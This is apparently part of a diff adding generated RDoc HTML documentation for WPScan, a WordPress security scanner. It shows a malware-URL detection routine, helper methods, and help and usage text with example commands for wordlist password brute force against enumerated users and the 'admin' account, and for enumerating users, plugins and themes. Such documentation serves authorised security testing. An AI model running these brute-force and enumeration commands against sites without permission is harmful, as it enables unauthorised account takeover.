<span class="ruby-keyword">if</span> <span class="ruby-ivar">@malwares</span>.<span class="ruby-identifier">nil?</span>
<span class="ruby-identifier">malwares_found</span> = []
<span class="ruby-identifier">malwares_file</span> = <span class="ruby-constant">Malwares</span>.<span class="ruby-identifier">malwares_file</span>(<span class="ruby-identifier">malwares_file_path</span>)
<span class="ruby-identifier">index_page_body</span> = <span class="ruby-constant">Browser</span>.<span class="ruby-identifier">instance</span>.<span class="ruby-identifier">get</span>(<span class="ruby-ivar">@uri</span>.<span class="ruby-identifier">to_s</span>).<span class="ruby-identifier">body</span>
<span class="ruby-constant">File</span>.<span class="ruby-identifier">open</span>(<span class="ruby-identifier">malwares_file</span>, <span class="ruby-string">'r'</span>) <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">file</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">file</span>.<span class="ruby-identifier">readlines</span>.<span class="ruby-identifier">collect</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">url</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">chomped_url</span> = <span class="ruby-identifier">url</span>.<span class="ruby-identifier">chomp</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">chomped_url</span>.<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">0</span>
<span class="ruby-identifier">malwares_found</span> <span class="ruby-operator">+=</span> <span class="ruby-identifier">index_page_body</span>.<span class="ruby-identifier">scan</span>(<span class="ruby-constant">Malwares</span>.<span class="ruby-identifier">malware_pattern</span>(<span class="ruby-identifier">chomped_url</span>))
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">malwares_found</span>.<span class="ruby-identifier">flatten!</span>
<span class="ruby-identifier">malwares_found</span>.<span class="ruby-identifier">uniq!</span>
<span class="ruby-ivar">@malwares</span> = <span class="ruby-identifier">malwares_found</span>
<span class="ruby-keyword">end</span>
<span class="ruby-ivar">@malwares</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- malwares-source -->
</div>
</div><!-- malwares-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

755
doc/Object.html Normal file
View File

@@ -0,0 +1,755 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>Class: Object</title>
<link rel="stylesheet" href="./rdoc.css" type="text/css" media="screen" />
<script src="./js/jquery.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript" charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript" charset="utf-8"></script>
</head>
<body id="top" class="class">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="file-metadata">
<div id="file-list-section" class="section">
<h3 class="section-header">In Files</h3>
<div class="section-body">
<ul>
<li><a href="./lib/common_helper_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/common_helper.rb">lib/common_helper.rb</a></li>
<li><a href="./lib/wpscan/wpscan_helper_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpscan/wpscan_helper.rb">lib/wpscan/wpscan_helper.rb</a></li>
<li><a href="./lib/wpstools/wpstools_helper_rb.html?TB_iframe=true&amp;height=550&amp;width=785"
class="thickbox" title="lib/wpstools/wpstools_helper.rb">lib/wpstools/wpstools_helper.rb</a></li>
</ul>
</div>
</div>
</div>
<div id="class-metadata">
<!-- Parent Class -->
<div id="parent-class-section" class="section">
<h3 class="section-header">Parent</h3>
<p class="link">BasicObject</p>
</div>
<!-- Method Quickref -->
<div id="method-list-section" class="section">
<h3 class="section-header">Methods</h3>
<ul class="link-list">
<li><a href="#method-i-add_http_protocol">#add_http_protocol</a></li>
<li><a href="#method-i-add_trailing_slash">#add_trailing_slash</a></li>
<li><a href="#method-i-banner">#banner</a></li>
<li><a href="#method-i-colorize">#colorize</a></li>
<li><a href="#method-i-get_equal_string_end">#get_equal_string_end</a></li>
<li><a href="#method-i-green">#green</a></li>
<li><a href="#method-i-help">#help</a></li>
<li><a href="#method-i-red">#red</a></li>
<li><a href="#method-i-require_files_from_directory">#require_files_from_directory</a></li>
<li><a href="#method-i-usage">#usage</a></li>
</ul>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class/Module Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
<li><a href="./Generate_List.html">Generate_List</a></li>
<li><a href="./GitUpdater.html">GitUpdater</a></li>
<li><a href="./Malwares.html">Malwares</a></li>
<li><a href="./Object.html">Object</a></li>
<li><a href="./RpcClient.html">RpcClient</a></li>
<li><a href="./SvnUpdater.html">SvnUpdater</a></li>
<li><a href="./Svn_Parser.html">Svn_Parser</a></li>
<li><a href="./Updater.html">Updater</a></li>
<li><a href="./UpdaterFactory.html">UpdaterFactory</a></li>
<li><a href="./Vulnerable.html">Vulnerable</a></li>
<li><a href="./WebSite.html">WebSite</a></li>
<li><a href="./WpConfigBackup.html">WpConfigBackup</a></li>
<li><a href="./WpDetector.html">WpDetector</a></li>
<li><a href="./WpEnumerator.html">WpEnumerator</a></li>
<li><a href="./WpFullPathDisclosure.html">WpFullPathDisclosure</a></li>
<li><a href="./WpItem.html">WpItem</a></li>
<li><a href="./WpLoginProtection.html">WpLoginProtection</a></li>
<li><a href="./WpOptions.html">WpOptions</a></li>
<li><a href="./WpPlugin.html">WpPlugin</a></li>
<li><a href="./WpPlugins.html">WpPlugins</a></li>
<li><a href="./WpReadme.html">WpReadme</a></li>
<li><a href="./WpTarget.html">WpTarget</a></li>
<li><a href="./WpTheme.html">WpTheme</a></li>
<li><a href="./WpThemes.html">WpThemes</a></li>
<li><a href="./WpTimthumbs.html">WpTimthumbs</a></li>
<li><a href="./WpUser.html">WpUser</a></li>
<li><a href="./WpUsernames.html">WpUsernames</a></li>
<li><a href="./WpVersion.html">WpVersion</a></li>
<li><a href="./WpVulnerability.html">WpVulnerability</a></li>
<li><a href="./WpscanOptions.html">WpscanOptions</a></li>
</ul>
<div id="no-class-search-results" style="display: none;">No matching classes.</div>
</div>
</div>
</div>
<div id="documentation">
<h1 class="class">Object</h1>
<div id="description" class="description">
</div><!-- description -->
<div id="5Buntitled-5D" class="documentation-section">
<!-- Constants -->
<div id="constants-list" class="section">
<h3 class="section-header">Constants</h3>
<dl>
<dt><a name="CACHE_DIR">CACHE_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="CONF_DIR">CONF_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="DATA_DIR">DATA_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="LIB_DIR">LIB_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="REVISION">REVISION</a></dt>
<dd class="description"></dd>
<dt><a name="ROOT_DIR">ROOT_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="UPDATER_LIB_DIR">UPDATER_LIB_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="WPSCAN_LIB_DIR">WPSCAN_LIB_DIR</a></dt>
<dd class="description"></dd>
<dt><a name="WPSCAN_VERSION">WPSCAN_VERSION</a></dt>
<dd class="description"></dd>
<dt><a name="WPSTOOLS_LIB_DIR">WPSTOOLS_LIB_DIR</a></dt>
<dd class="description"></dd>
</dl>
</div>
<!-- Methods -->
<div id="public-instance-method-details" class="method-section section">
<h3 class="section-header">Public Instance Methods</h3>
<div id="add_http_protocol-method" class="method-detail ">
<a name="method-i-add_http_protocol"></a>
<div class="method-heading">
<span class="method-name">add_http_protocol</span><span
class="method-args">(url)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Add protocol</p>
<div class="method-source-code" id="add_http_protocol-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 42</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">add_http_protocol</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-keyword">if</span> <span class="ruby-identifier">url</span> <span class="ruby-operator">!~</span> <span class="ruby-regexp">/^https?:/</span>
<span class="ruby-identifier">url</span> = <span class="ruby-node">&quot;http://#{url}&quot;</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">url</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- add_http_protocol-source -->
</div>
</div><!-- add_http_protocol-method -->
<div id="add_trailing_slash-method" class="method-detail ">
<a name="method-i-add_trailing_slash"></a>
<div class="method-heading">
<span class="method-name">add_trailing_slash</span><span
class="method-args">(url)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="add_trailing_slash-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 49</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">add_trailing_slash</span>(<span class="ruby-identifier">url</span>)
<span class="ruby-identifier">url</span> = <span class="ruby-node">&quot;#{url}/&quot;</span> <span class="ruby-keyword">if</span> <span class="ruby-identifier">url</span> <span class="ruby-operator">!~</span> <span class="ruby-regexp">/\/$/</span>
<span class="ruby-identifier">url</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- add_trailing_slash-source -->
</div>
</div><!-- add_trailing_slash-method -->
<div id="banner-method" class="method-detail ">
<a name="method-i-banner"></a>
<div class="method-heading">
<span class="method-name">banner</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>our 1337 banner</p>
<div class="method-source-code" id="banner-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 106</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">banner</span>()
<span class="ruby-identifier">puts</span> <span class="ruby-string">'____________________________________________________'</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; __ _______ _____ &quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; \\ \\ / / __ \\ / ____| &quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; \\ \\ /\\ / /| |__) | (___ ___ __ _ _ __ &quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; \\ \\/ \\/ / | ___/ \\___ \\ / __|/ _` | '_ \\ &quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; \\ /\\ / | | ____) | (__| (_| | | | |&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot; \\/ \\/ |_| |_____/ \\___|\\__,_|_| |_| v#{WPSCAN_VERSION}r#{REVISION}&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; WordPress Security Scanner by the WPScan Team&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; Sponsored by the RandomStorm Open Source Initiative&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">'_____________________________________________________'</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">if</span> <span class="ruby-constant">RUBY_VERSION</span> <span class="ruby-operator">&lt;</span> <span class="ruby-string">&quot;1.9&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;[WARNING] Ruby &lt; 1.9 not officially supported, please upgrade.&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- banner-source -->
</div>
</div><!-- banner-method -->
<div id="colorize-method" class="method-detail ">
<a name="method-i-colorize"></a>
<div class="method-heading">
<span class="method-name">colorize</span><span
class="method-args">(text, color_code)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="colorize-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 125</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">colorize</span>(<span class="ruby-identifier">text</span>, <span class="ruby-identifier">color_code</span>)
<span class="ruby-node">&quot;\e[#{color_code}m#{text}\e[0m&quot;</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- colorize-source -->
</div>
</div><!-- colorize-method -->
<div id="get_equal_string_end-method" class="method-detail ">
<a name="method-i-get_equal_string_end"></a>
<div class="method-heading">
<span class="method-name">get_equal_string_end</span><span
class="method-args">(stringarray = [""])</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>Gets the string all elements in stringarray ends with</p>
<div class="method-source-code" id="get_equal_string_end-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 55</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">get_equal_string_end</span>(<span class="ruby-identifier">stringarray</span> = [<span class="ruby-string">&quot;&quot;</span>])
<span class="ruby-identifier">already_found</span> = <span class="ruby-string">&quot;&quot;</span>
<span class="ruby-identifier">looping</span> = <span class="ruby-keyword">true</span>
<span class="ruby-identifier">counter</span> = <span class="ruby-value">-1</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">stringarray</span>.<span class="ruby-identifier">kind_of?</span> <span class="ruby-constant">Array</span> <span class="ruby-keyword">and</span> <span class="ruby-identifier">stringarray</span>.<span class="ruby-identifier">length</span> <span class="ruby-operator">&gt;</span> <span class="ruby-value">1</span>
<span class="ruby-identifier">base</span> = <span class="ruby-identifier">stringarray</span>[<span class="ruby-value">0</span>]
<span class="ruby-keyword">while</span> <span class="ruby-identifier">looping</span>
<span class="ruby-identifier">character</span> = <span class="ruby-identifier">base</span>[<span class="ruby-identifier">counter</span>, <span class="ruby-value">1</span>]
<span class="ruby-identifier">stringarray</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">s</span><span class="ruby-operator">|</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">s</span>[<span class="ruby-identifier">counter</span>, <span class="ruby-value">1</span>] <span class="ruby-operator">!=</span> <span class="ruby-identifier">character</span>
<span class="ruby-identifier">looping</span> = <span class="ruby-keyword">false</span>
<span class="ruby-keyword">break</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">if</span> <span class="ruby-identifier">looping</span> <span class="ruby-operator">==</span> <span class="ruby-keyword">false</span> <span class="ruby-keyword">or</span> (<span class="ruby-identifier">counter</span> * <span class="ruby-value">-1</span>) <span class="ruby-operator">&gt;</span> <span class="ruby-identifier">base</span>.<span class="ruby-identifier">length</span>
<span class="ruby-keyword">break</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">already_found</span> = <span class="ruby-node">&quot;#{character if character}#{already_found}&quot;</span>
<span class="ruby-identifier">counter</span> <span class="ruby-operator">-=</span> <span class="ruby-value">1</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span>
<span class="ruby-identifier">already_found</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- get_equal_string_end-source -->
</div>
</div><!-- get_equal_string_end-method -->
<div id="green-method" class="method-detail ">
<a name="method-i-green"></a>
<div class="method-heading">
<span class="method-name">green</span><span
class="method-args">(text)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="green-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 133</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">green</span>(<span class="ruby-identifier">text</span>)
<span class="ruby-identifier">colorize</span>(<span class="ruby-identifier">text</span>, <span class="ruby-value">32</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- green-source -->
</div>
</div><!-- green-method -->
<div id="help-method" class="method-detail ">
<a name="method-i-help"></a>
<div class="method-heading">
<span class="method-name">help</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>command help</p>
<div class="method-source-code" id="help-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_helper.rb, line 71</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">help</span>()
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Help :&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Some values are settable in conf/browser.conf.json :&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; user-agent, proxy, threads, cache timeout and request timeout&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--update Update to the latest revision&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--url | -u &lt;target url&gt; The WordPress URL/domain to scan.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--force | -f Forces WPScan to not check if the remote site is running WordPress.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--enumerate | -e [option(s)] Enumeration.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; option :&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; u usernames from id 1 to 10&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; u[10-20] usernames from id 10 to 20 (you must write [] chars)&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; p plugins&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; p! only vulnerable plugins&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; t timthumbs&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; T themes&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; T! only vulnerable themes&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; Multiple values are allowed : '-e tp' will enumerate timthumbs and plugins&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; If no option is supplied, the default is 'tup!'&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--config-file | -c &lt;config file&gt; Use the specified config file&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--follow-redirection If the target url has a redirection, it will be followed without asking if you wanted to do so or not&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--wp-content-dir &lt;wp content dir&gt; WPScan try to find the content directory (ie wp-content) by scanning the index page, however you can specified it. Subdirectories are allowed&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--wp-plugins-dir &lt;wp plugins dir&gt; Same thing than --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--proxy Supply a proxy in the format host:port or protocol://host:port (will override the one from conf/browser.conf.json).&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot; HTTP, SOCKS4 SOCKS4A and SOCKS5 are supported. If no protocol is given (format host:port), HTTP will be used&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--wordlist | -w &lt;wordlist&gt; Supply a wordlist for the password bruter and do the brute.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--threads | -t &lt;number of threads&gt; The number of threads to use when multi-threading requests. (will override the value from conf/browser.conf.json)&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--username | -U &lt;username&gt; Only brute force the supplied username.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--help | -h This help screen.&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--verbose | -v Verbose output.&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- help-source -->
</div>
</div><!-- help-method -->
<div id="red-method" class="method-detail ">
<a name="method-i-red"></a>
<div class="method-heading">
<span class="method-name">red</span><span
class="method-args">(text)</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<div class="method-source-code" id="red-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 129</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">red</span>(<span class="ruby-identifier">text</span>)
<span class="ruby-identifier">colorize</span>(<span class="ruby-identifier">text</span>, <span class="ruby-value">31</span>)
<span class="ruby-keyword">end</span></pre>
</div><!-- red-source -->
</div>
</div><!-- red-method -->
<div id="require_files_from_directory-method" class="method-detail ">
<a name="method-i-require_files_from_directory"></a>
<div class="method-heading">
<span class="method-name">require_files_from_directory</span><span
class="method-args">(absolute_dir_path, files_pattern = "*.rb")</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>TODO : add an exclude pattern ?</p>
<div class="method-source-code" id="require_files_from_directory-source">
<pre>
<span class="ruby-comment"># File lib/common_helper.rb, line 33</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">require_files_from_directory</span>(<span class="ruby-identifier">absolute_dir_path</span>, <span class="ruby-identifier">files_pattern</span> = <span class="ruby-string">&quot;*.rb&quot;</span>)
<span class="ruby-constant">Dir</span>[<span class="ruby-constant">File</span>.<span class="ruby-identifier">join</span>(<span class="ruby-identifier">absolute_dir_path</span>, <span class="ruby-identifier">files_pattern</span>)].<span class="ruby-identifier">sort</span>.<span class="ruby-identifier">each</span> <span class="ruby-keyword">do</span> <span class="ruby-operator">|</span><span class="ruby-identifier">f</span><span class="ruby-operator">|</span>
<span class="ruby-identifier">f</span> = <span class="ruby-constant">File</span>.<span class="ruby-identifier">expand_path</span>(<span class="ruby-identifier">f</span>)
<span class="ruby-identifier">require</span> <span class="ruby-identifier">f</span>
<span class="ruby-comment">#puts &quot;require #{f}&quot; # Used for debug</span>
<span class="ruby-keyword">end</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- require_files_from_directory-source -->
</div>
</div><!-- require_files_from_directory-method -->
<div id="usage-method" class="method-detail ">
<a name="method-i-usage"></a>
<div class="method-heading">
<span class="method-name">usage</span><span
class="method-args">()</span>
<span class="method-click-advice">click to toggle source</span>
</div>
<div class="method-description">
<p>wpscan usage</p>
<div class="method-source-code" id="usage-source">
<pre>
<span class="ruby-comment"># File lib/wpscan/wpscan_helper.rb, line 24</span>
<span class="ruby-keyword">def</span> <span class="ruby-identifier">usage</span>()
<span class="ruby-identifier">script_name</span> = <span class="ruby-identifier">$0</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;--help or -h for further help.&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;Examples :&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Do 'non-intrusive' checks ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Do wordlist password brute force on enumerated users using 50 threads ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --wordlist darkc0de.lst --threads 50&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Do wordlist password brute force on the 'admin' username only ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --wordlist darkc0de.lst --username admin&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Enumerate installed plugins ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --enumerate p&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Enumerate installed themes ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --enumerate T&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Enumerate users ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --enumerate u&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Enumerate installed timthumbs ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --enumerate t&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Use a HTTP proxy ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --proxy 127.0.0.1:8118&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Use a SOCKS5 proxy ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --url www.example.com --proxy socks5://127.0.0.1:9000&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Use custom content directory ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} -u www.example.com --wp-content-dir custom-content&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Use custom plugins directory ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} -u www.example.com --wp-plugins-dir wp-content/custom-plugins&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;-Update ...&quot;</span>
<span class="ruby-identifier">puts</span> <span class="ruby-node">&quot;ruby #{script_name} --update&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-identifier">puts</span> <span class="ruby-string">&quot;See README for further information.&quot;</span>
<span class="ruby-identifier">puts</span>
<span class="ruby-keyword">end</span></pre>
</div><!-- usage-source -->
</div>
</div><!-- usage-method -->
</div><!-- public-instance-method-details -->
</div><!-- 5Buntitled-5D -->
</div><!-- documentation -->
<div id="validator-badges">
<p><small><a href="http://validator.w3.org/check/referer">[Validate]</a></small></p>
<p><small>Generated with the <a href="http://deveiate.org/projects/Darkfish-Rdoc/">Darkfish
Rdoc Generator</a> 2</small>.</p>
</div>
</body>
</html>

329
doc/README.html Normal file
View File

@@ -0,0 +1,329 @@
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type" />
<title>File: README [RDoc Documentation]</title>
<link type="text/css" media="screen" href="./rdoc.css" rel="stylesheet" />
<script src="./js/jquery.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/thickbox-compressed.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/quicksearch.js" type="text/javascript"
charset="utf-8"></script>
<script src="./js/darkfish.js" type="text/javascript"
charset="utf-8"></script>
</head>
<body class="file">
<div id="metadata">
<div id="home-metadata">
<div id="home-section" class="section">
<h3 class="section-header">
<a href="./index.html">Home</a>
<a href="./index.html#classes">Classes</a>
<a href="./index.html#methods">Methods</a>
</h3>
</div>
</div>
<div id="project-metadata">
<div id="fileindex-section" class="section project-section">
<h3 class="section-header">Files</h3>
<ul>
<li class="file"><a href="./CREDITS.html">CREDITS</a></li>
<li class="file"><a href="./Gemfile.html">Gemfile</a></li>
<li class="file"><a href="./README.html">README</a></li>
</ul>
</div>
<div id="classindex-section" class="section project-section">
<h3 class="section-header">Class Index
<span class="search-toggle"><img src="./images/find.png"
height="16" width="16" alt="[+]"
title="show/hide quicksearch" /></span></h3>
<form action="#" method="get" accept-charset="utf-8" class="initially-hidden">
<fieldset>
<legend>Quicksearch</legend>
<input type="text" name="quicksearch" value=""
class="quicksearch-field" />
</fieldset>
</form>
<ul class="link-list">
<li><a href="./Array.html">Array</a></li>
<li><a href="./Browser.html">Browser</a></li>
<li><a href="./BruteForce.html">BruteForce</a></li>
<li><a href="./CacheFileStore.html">CacheFileStore</a></li>
<li><a href="./Exploit.html">Exploit</a></li>
